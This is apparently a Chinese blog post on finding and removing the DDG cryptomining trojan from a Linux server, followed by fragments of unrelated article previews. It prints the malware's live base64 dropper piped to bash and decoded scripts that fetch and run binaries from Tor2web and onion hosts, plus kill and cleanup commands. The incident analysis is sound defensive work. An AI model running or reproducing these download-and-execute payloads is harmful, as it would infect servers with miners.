#!/bin/bash
exec &>/dev/null
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcHM0YzRvaHh2cTdvCmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluIC91c3IvYmluICRkaXIgL2Rldi9zaG0gL3RtcCAvdmFyL3RtcDtkbyB0b3VjaCAkaS9pICYmIGNkICRpICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp4KCkgewpmPS9pbnQKZD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCndnZXQgLXQxIC1UMTAgLXFVLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJGYgLU8kZCB8fCBjdXJsIC1tMTAgLWZzU0xrQS0gJDEkZiAtbyRkCmNobW9kICt4ICRkOyRkO3JtIC1mICRkCn0KdSgpIHsKeD0vY3JuCndnZXQgLXQxIC1UMTAgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSR4IHx8IGN1cmwgLW0xMCAtZnNTTGtBLSAkMSR4Cn0KZm9yIGggaW4gdG9yMndlYi5pbyA0dG9yLm1sIG9uaW9uLm1uIG9uaW9uLmluLm5ldCBvbmlvbi50byBkMndlYi5vcmcgY2l2aWNsaW5rLm5ldHdvcmsgb25pb24ud3Mgb25pb24ubnogb25pb24uZ2xhc3MgdG9yMndlYi5zdQpkbwppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgp4IHRydW1wczRjNG9oeHZxN28uJGgKZWxzZQpicmVhawpmaQpkb25lCgppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgooCnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5kMndlYi5vcmcgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLmluLm5ldCB8fAp1ICR0Lm9uaW9uLnRvIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24uZ2xhc3MgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d|bash
使用bash64解密后内容：
 
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=trumps4c4ohxvq7o
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
for i in /usr/bin $dir /dev/shm /tmp /var/tmp;do touch $i/i && cd $i && rm -f i && break;done
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d-)
wget -t1 -T10 -qU- --no-check-certificate $1$f -O$d || curl -m10 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
u() {
x=/crn
wget -t1 -T10 -qU- -O- --no-check-certificate $1$x || curl -m10 -fsSLkA- $1$x
for h in tor2web.io 4tor.ml onion.mn onion.in.net onion.to d2web.org civiclink.network onion.ws onion.nz onion.glass tor2web.su
if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
x trumps4c4ohxvq7o.$h
break
if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
u $t.tor2web.io ||
u $t.4tor.ml ||
u $t.d2web.org ||
u $t.onion.mn ||
u $t.onion.in.net ||
u $t.onion.to ||
u $t.civiclink.network ||
u $t.onion.pet ||
u $t.tor2web.su ||
u $t.onion.glass ||
u $t.onion.ws
)|bash
结合腾讯安全预警： https://cloud.tencent.com/developer/article/1402851
 
http://bbs.qcloud.com/thread-30706-1-1.html?_ga=1.176497829.1600736125.1550482092
 
分析是DDG挖矿木马病毒。
 
此外，发现.ssh下的known_hosts被添加如下一条公钥记录
 
主机hosts中也添加了如下记录：
 
0.0.0.0 aliyun.one
0.0.0.0 lsd.systemten.org
0.0.0.0 pastebin.com
0.0.0.0 pm.cpuminerpool.com
0.0.0.0 systemten.org
此外，病毒还会在后台设置守护进程，查看方式
 
ls -al  /tmp/.X11-unix/
 
查看该目录下的 00、11、22内容可以看到几个数字，00文件存放病毒守护进程pid、11文件存放病毒运行进程pid、22为一个空文件，功能暂时不清楚。
 
9423为病毒守护进程pid
 
15043为病毒正在运行的pid
 
可以看到守护进程内容
 
sh -c echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAidHJ1bXB6d2x2bHlydmxzcyIpCgpzb2NreigpIHsKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgoJGMgaHR0cHM6Ly9kb2guY2VudHJhbGV1LnBpLWRucy5jb20vJHAgfHwKICAgICAkYyBodHRwczovL2Rucy50d25pYy50dy8kcCB8fAogICAgICRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kb2guZG5zLnNiLyRwIDsgaG9zdCAtVyA1IHJlbGF5LnRvcjJzb2Nrcy5pbnxhd2sgeydwcmludCAkTkYnfSlcCiAgICAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfHNvcnQgLXVSfGhlYWQgLTEgKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAkZCAvdG1wIC92YXIvdG1wIC9kZXYvc2htIC91c3IvYmluIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2NwdQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IHx8ICRjICQxJGYgLW8keApjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaW8gdG9yMndlYi50byB0b3Iyd2ViLnN1CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC0xIC90bXAvLlgxMS11bml4LzExKS9pbzsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo= |base64 -d|bash
使用base64解密后内容如下：
 
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "trumpzwlvlyrvlss")
sockz() {
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$(($c https://doh.centraleu.pi-dns.com/$p ||
     $c https://dns.twnic.tw/$p ||
     $c https://dns.rubyfish.cn/$p ||
     $c https://doh.dns.sb/$p ; host -W 5 relay.tor2socks.in|awk {'print $NF'})\
     | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1 )
fexe() {
for i in $d /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
u() {
sockz
f=/cpu
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
for h in tor2web.in tor2web.io tor2web.to tor2web.su
if ! ls /proc/$(head -1 /tmp/.X11-unix/11)/io; then
u $t.$h
break
内容还是比较清晰的。
 
清理病毒：
 
kill -9 35138 && kill -9 9423 && rm -rf /etc/cron.d/0wlvly && rm -rf /var/spool/cron/root && chattr -i /root/.wlvly.sh && rm -rf /root/.wlvly.sh && chattr -i /opt/wlvly.sh && rm -rf /opt/wlvly.sh
 
创建免疫文件夹，防止再次感染：
 
mkdir /root/wlvly.sh && chmod 000 /root/wlvly.sh && mkdir /opt/wlvly.sh && chmod 000 /opt/wlvly.sh
 
最近发现该病毒换个文件名.systemd-service.sh，找到病毒进程pid后清理过程如下：
 
kill -9 26062 && rm -rf /etc/cron.d/0systemd-service && rm -rf /var/spool/cron/root && chattr -i /root/.systemd-service.sh && rm -rf /root/.systemd-service.sh && chattr -i /opt/systemd-service.sh && rm -rf /opt/systemd-service.sh
mkdir /root/systemd-service.sh && chmod 000 /root/systemd-service.sh && mkdir /opt/systemd-service.sh && chmod 000 /opt/systemd-service.sh
 
				
kworkerds挖矿病毒排查过程
2019年3月2日晚上，收到报警邮件，出现多台服务器cpu使用率超过百分之九十五现象。登录服务器查看，发现存在cpu使用率超高的进程kworkerds 的存在，不用多说，这个名字只要是接触过挖矿病毒的运维人员都知道，那么下面开始排查及清理。
中了此病毒的服务器有两种（目前发现）情况：
第一种，使用top命令可以直接查看到是哪个进程在消耗CPU资源；
第二种，使用...
#lsof 进程名     如果是挖矿程序可以看到明显的异常
具体lsof的用法 请参考  https://www.cnblogs.com/sparkbj/p/7161669.html
确定挖矿程序的路径以后，先kill掉进程，再删除文件
#kill -9 555
#rm -rf /tmp/wakuang.sh
2、清理定时任务
一般只...
				
今天上班，发现公司的服务都没了，进服务器一看，好家伙，top一看，cpu直接飙到百分之80，还是个乱码的进程名称，一看就是挖矿的病毒。
然后我查资料，说是先通过 /proc/pid/exe 找到进程路径，但是我查了，直接报exe目录是空的。
这就神奇了，和网上说的不一样。是不是情况不一样。
然后我去看了定时任务：crontab -e 发现新增的一个定时器，名字叫.systemd-service.sh。
然后sh逻辑是显示一串类似秘钥的东西。
所以这个挖矿病毒的逻辑应该是通过redis的6379端.
				
0x00、前言
每年的互联网安全报告中，服务器挖矿行为都被各大云厂商重点指出，被植入挖矿木马的服务器会出现CPU使用率飙升、系统卡顿、业务服务无法正常使用等情况，严重影响企业上云的信心。在这里有必要和大家聊一下，公有云挖矿检测相关技术和产品化相关事宜，同时揭秘，在不同场景下检测与对抗的手段等。
0x01、Linux挖矿木马攻击手段
本文主要讲述的是Linux操作系统挖矿行为，因为绝大部分公有云服务器安装的是linux操作系统，占比维持在70~80%。
阶段1：网络层面NIDS规则分析
				
服务器中挖矿病毒了，c3pool，经过了一顿操作，删除定时任务、清除.ssh、删除各种可执行文件、删除开机启动任务之后，病毒算是消停了，进程里也没有了踪迹，CPU占用也下来了。（具体过程请百度，大同小异）。
但是，问题出现了，一顿操作之后重启服务器，在任何服务都未启动的情况下，内存已经65%，通过top看不出任何问题，只能通过free命令看到used的内存已经达到了2.4G（服务器总内存4G）。
这时候再启动我们的服务，就会出现内存不足、进程莫名其妙退出等情况。
经过了一系列努力，最终通过查看病毒的原始代
看上面的症状是：攻击者通过docker入侵的【后面了解，肯能是redis账号密码简单的原因被爆破的】
最奇诡的事，攻击者可能通过提权，获取到root的权限。然后一些列的挖矿病毒
大致流程图
				
之前在9月份的时候，我的阿里云服务器出现过一次被挖矿的情况，也是cpu爆满，后来发现是因为mysql的漏洞。
当时抓着mysql一顿处理，新建用户，强密码，设权限，nologin，可算是正常了。
这几天又再次出现了被挖矿的情况，今天算是解决了，舒服，下面说下情况。
表现：服务器上的web应用一场的慢，ssh登陆进去top -c查看如下：
COMMAN处的[UWcUml]占用cpu100...
				
公司有台做voip的服务器最近CPU总是跑满，这机器自从交给厂家搭好环境后基本就没怎么管它，于是进去查看进程，top了下（见下图）
这个叫wnTKYg的进程很诡异，已经把CPU吃光了，上网一查，原来是中了挖矿的马。（啊，我的天。这只是一个单核1G内存的阿里云主机）既然被***了，那就得干掉它，下面是解决过程：
1：第一步要先找到这个wnTKYg文件实体，对了还有一个叫ddg.2020的进程。
				
 对于windows用户如果用Cygwin模拟unix环境的话，里面没有带curl命令，要自己装，所以建议用Gow来模拟，它已经自带了curl工具，安装后直接在cmd环境中用curl命令就可，因为路径已经自动给你配置好了。
    linux curl是一个利用URL规则在命令行下工作的文件传输工具。它支持文件的上传和下载，所以是综合传输工具，
但按传统，习惯称url为下载工具。　　一，cur...
				
在调试一块设备连接业务平台是发现报错：
* SSLv3, TLS handshake, Client hello (1):
* SSLv3, TLS handshake, Server hello (2):
* SSLv3, TLS handshake, CERT (11):
* SSLv3, TLS alert, Server hello (2):
* SSL certificate probl...
				
每一种客户端在处理https的连接时都会使用不同的证书库。IE浏览器和FireFox浏览器都可以在本浏览器的控制面板中找到证书管理器。在证书管理器中可以自由添加、删除根证书。而Linux的curl使用的证书库在文件“/etc/pki/tls/certs/ca-bundle.crt”中。（CentOS）
以下是curl在访问https站点时常见的报错信息
1.Peer’s Certifica
				基于腾讯云服务器的Docker环境，使用logstash同步的Kafka中数据时报错partitions have leader brokers without a matching listener